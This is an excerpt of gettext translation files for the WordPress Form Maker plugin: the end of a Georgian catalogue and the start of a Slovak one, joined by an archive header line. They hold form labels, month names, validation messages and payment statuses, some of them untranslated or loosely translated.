#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "მარტი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "აპრილი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "მაისი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "ივნისი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "ივლისი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "აგვისტო"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "სექტემბერი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "ოქტომბერი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "ნოემბერი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "დეკემბერი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "შეცდომა, არასწორი დამცავი კოდი."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "თქვენი IP არის შავ სიაში. დაუკავშირდით ნახვა ადმინისტრაციას"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "ფაილი აღემატება დასაშვებ ზომა"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "უკაცრავად, მაგრამ თქვენ არ გაქვთ ატვირთვა ასეთი ტიპის ფაილი."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "შეცდომა, ფაილი ვერ გადავიდა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"ეს ველი %s მოითხოვს უნიკალური შესვლის და ამ მნიშვნელობის უკვე წარადგინა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "შეცდომა, ელ არ გაეგზავნა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "არაფერი არ იყო გამოგზავნილი."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "თქვენს ფორმას წარმატებით წარმოადგინა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "შეცდომა, ელ არ გაეგზავნა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "თქვენი ელექტრონული ფოსტის მისამართი უკვე დადასტურებულია."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "თქვენი ელ-ფოსტა წარმატებით დადასტურდა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "თქვენი ელ გადამოწმების შედეგად გავიდა."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "გადამოწმების ბმული არასწორია."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "ველი აუცილებელია."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "ეს არ არის სწორი ელ."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"თქვენ არ შეგიძლიათ შეარჩიოთ ყოფილი ვადები. აირჩიეთ თარიღი დაწყებული "
"მიმდინარე ერთი."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "ღირებულება უნდა იყოს"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "რაოდენობა"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "თქვენი ანგარიში არ უნდა აღემატებოდეს "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "სათაური"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "პირველი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "ბოლო"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "ახლო"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "კოდი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "ტელეფონი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "დოლარი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "ცენტი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "დან"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "უნდა"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "გადასვლა "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "რესეტი "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "აირჩიეთ სფერო"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "აირჩიეთ თარიღი"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-sk_SK.po000060400000056671152434416630012227 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:03+0400\n"
"PO-Revision-Date: 2015-05-22 17:04+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: sk\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Ulica"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Ulica riadok 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Mesto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Štát / provincia / región"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Poštové / PSČ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Krajina"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Január"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Február"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marec"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Apríl"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Máj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Jún"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Júl"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Október"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "December"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Chyba, nesprávny bezpečnostný kód."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Vaša IP je na čiernej listine. Prosím, obráťte sa na správcu webu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Súboru presiahne povolenú veľkosť"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
